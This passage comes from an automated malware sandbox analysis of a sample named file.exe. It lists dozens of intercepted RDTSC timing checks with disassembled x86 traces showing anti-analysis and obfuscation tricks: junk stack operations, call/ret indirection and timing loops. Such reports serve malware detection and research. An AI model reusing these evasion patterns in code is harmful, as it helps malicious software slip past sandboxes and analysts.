ebx 0x0000006f push ebx 0x00000070 ret 0x00000071 pop ebx 0x00000072 ret 0x00000073 jmp 00007FF9ACE940A6h 0x00000078 nop 0x00000079 jmp 00007FF9ACE9409Ah 0x0000007e push eax 0x0000007f push eax 0x00000080 push edx 0x00000081 jmp 00007FF9ACE940A4h 0x00000086 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD9C68 second address: DD9C85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF9ACEA2299h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD9E2 second address: DDDA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FF9ACE94098h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov di, E086h 0x0000002b push 00000000h 0x0000002d movsx ebx, cx 0x00000030 xchg eax, esi 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FF9ACE9409Bh 0x0000003a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDDA2A second address: DDDA30 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDCAE1 second address: DDCAE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDDA30 second address: DDDA35 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDDA35 second address: DDDA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jbe 00007FF9ACE94098h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FF9ACE9409Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDEA42 second address: DDEA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACEA228Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF9ACEA2299h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDEA6C second address: DDEB2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE9409Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FF9ACE94098h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007FF9ACE94098h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000015h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 mov edi, dword ptr [ebp+122D385Bh] 0x00000047 call 00007FF9ACE9409Ch 0x0000004c pop ebx 0x0000004d mov ebx, 1F679C15h 0x00000052 push 00000000h 0x00000054 pushad 0x00000055 mov bx, di 0x00000058 call 00007FF9ACE940A4h 0x0000005d and edx, 3C255B81h 0x00000063 pop esi 0x00000064 popad 0x00000065 push eax 0x00000066 pushad 0x00000067 jmp 00007FF9ACE940A9h 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007FF9ACE940A7h 0x00000073 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8055E second address: D80577 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FF9ACEA2291h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDED70 second address: DDED76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDED76 second address: DDED7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE3240 second address: DE3244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7B50 second address: DE7B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE71D8 second address: DE71ED instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF9ACE94096h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE71ED second address: DE71F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEBBBC second address: DEBBC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEBBC6 second address: DEBBFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FF9ACEA228Dh 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF9ACEA2298h 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEBBFB second address: DEBC18 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF9ACE94096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FF9ACE9409Ch 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEBC18 second address: DEBC1D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED196 second address: DED1B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FF9ACE94096h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007FF9ACE940A1h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED1B3 second address: DED1BD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF9ACEA228Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED1BD second address: DED1EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACE940A7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF9ACE9409Bh 0x00000013 jne 00007FF9ACE94096h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF47B8 second address: DF47BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF47BE second address: DF47D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push ebx 0x00000007 jng 00007FF9ACE9409Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FF9ACE94096h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF47D9 second address: DF47DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EA1C second address: D7EA26 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF9ACE9409Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF34EC second address: DF34F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3A4D second address: DF3A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3A53 second address: DF3A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF9ACEA2286h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3A5E second address: DF3A75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A0h 0x00000007 push ebx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3F11 second address: DF3F54 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF9ACEA2292h 0x00000008 jmp 00007FF9ACEA2294h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF9ACEA2297h 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF430D second address: DF4313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4313 second address: DF4324 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FF9ACEA2286h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4324 second address: DF433E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jl 00007FF9ACE94096h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FF9ACE94096h 0x00000014 jp 00007FF9ACE94096h 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF433E second address: DF4342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4342 second address: DF4348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF9C85 second address: DF9C8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B3B4 second address: D7B3D6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF9ACE94096h 0x00000008 js 00007FF9ACE94096h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 js 00007FF9ACE940B4h 0x00000017 pushad 0x00000018 push eax 0x00000019 pop eax 0x0000001a jo 00007FF9ACE94096h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B3D6 second address: D7B3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B3DC second address: D7B3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8B04 second address: DF8B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8B08 second address: DF8B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF90A2 second address: DF90A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF90A6 second address: DF90AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8803 second address: DF8808 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF95CA second address: DF95D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF9704 second address: DF970A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E03E38 second address: E03E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02A83 second address: E02A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02A89 second address: E02A93 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF9ACE94096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02BF9 second address: E02BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02BFF second address: E02C05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02D61 second address: E02D6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02D6C second address: E02D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E032DA second address: E032DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E032DE second address: E032E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E036C5 second address: E036C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E03831 second address: E03835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E03835 second address: E0383B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0383B second address: E03841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E03841 second address: E03847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E03847 second address: E03858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACE9409Dh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E03CC8 second address: E03CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FF9ACEA2286h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E03CD7 second address: E03CDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E08756 second address: E0875A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0875A second address: E08760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E075F7 second address: E07600 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC9E11 second address: DC9E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FF9ACE940A3h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FF9ACE94098h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+122D36BFh] 0x0000002d lea eax, dword ptr [ebp+12490BA8h] 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007FF9ACE94098h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d add edx, dword ptr [ebp+122D38B3h] 0x00000053 nop 0x00000054 push ecx 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC9E85 second address: DA9A64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a js 00007FF9ACEA2286h 0x00000010 je 00007FF9ACEA2286h 0x00000016 popad 0x00000017 pop ecx 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FF9ACEA2288h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov dh, F5h 0x00000035 call dword ptr [ebp+122D26FAh] 0x0000003b pushad 0x0000003c jp 00007FF9ACEA2288h 0x00000042 pushad 0x00000043 popad 0x00000044 jl 00007FF9ACEA2288h 0x0000004a push eax 0x0000004b pop eax 0x0000004c popad 0x0000004d jc 00007FF9ACEA22B0h 0x00000053 pushad 0x00000054 jns 00007FF9ACEA2286h 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA431 second address: DCA446 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jnl 00007FF9ACE94096h 0x00000014 pop esi 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA446 second address: DCA46C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF9ACEA228Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FF9ACEA228Ah 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pushad 0x00000019 popad 0x0000001a pop edi 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA6F9 second address: DCA6FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCABC0 second address: DCABFF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a cld 0x0000000b push 0000001Eh 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FF9ACEA2288h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 xor dword ptr [ebp+122D21C5h], edx 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jbe 00007FF9ACEA228Ch 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCABFF second address: DCAC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAD52 second address: DCAD5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF9ACEA2286h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAD5C second address: DCAD60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAFA1 second address: DCAFAB instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF9ACEA2286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAFAB second address: DCB045 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FF9ACE94098h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D18D2h], esi 0x0000002a lea eax, dword ptr [ebp+12490BECh] 0x00000030 mov dword ptr [ebp+122D2600h], ecx 0x00000036 push eax 0x00000037 jmp 00007FF9ACE940A0h 0x0000003c mov dword ptr [esp], eax 0x0000003f jg 00007FF9ACE94096h 0x00000045 lea eax, dword ptr [ebp+12490BA8h] 0x0000004b push 00000000h 0x0000004d push ecx 0x0000004e call 00007FF9ACE94098h 0x00000053 pop ecx 0x00000054 mov dword ptr [esp+04h], ecx 0x00000058 add dword ptr [esp+04h], 00000016h 0x00000060 inc ecx 0x00000061 push ecx 0x00000062 ret 0x00000063 pop ecx 0x00000064 ret 0x00000065 nop 0x00000066 push eax 0x00000067 push edx 0x00000068 jc 00007FF9ACE94098h 0x0000006e pushad 0x0000006f popad 0x00000070 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCB045 second address: DCB04A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCB04A second address: DAA5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f pop ecx 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FF9ACE94098h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b xor dword ptr [ebp+12474D84h], edx 0x00000031 call dword ptr [ebp+122D35F4h] 0x00000037 pushad 0x00000038 jmp 00007FF9ACE940A6h 0x0000003d ja 00007FF9ACE94098h 0x00000043 pushad 0x00000044 jmp 00007FF9ACE940A7h 0x00000049 pushad 0x0000004a popad 0x0000004b push edx 0x0000004c pop edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07922 second address: E07926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07926 second address: E07935 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF9ACE94096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07935 second address: E0793F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF9ACEA2286h 0x0000000a rdtsc
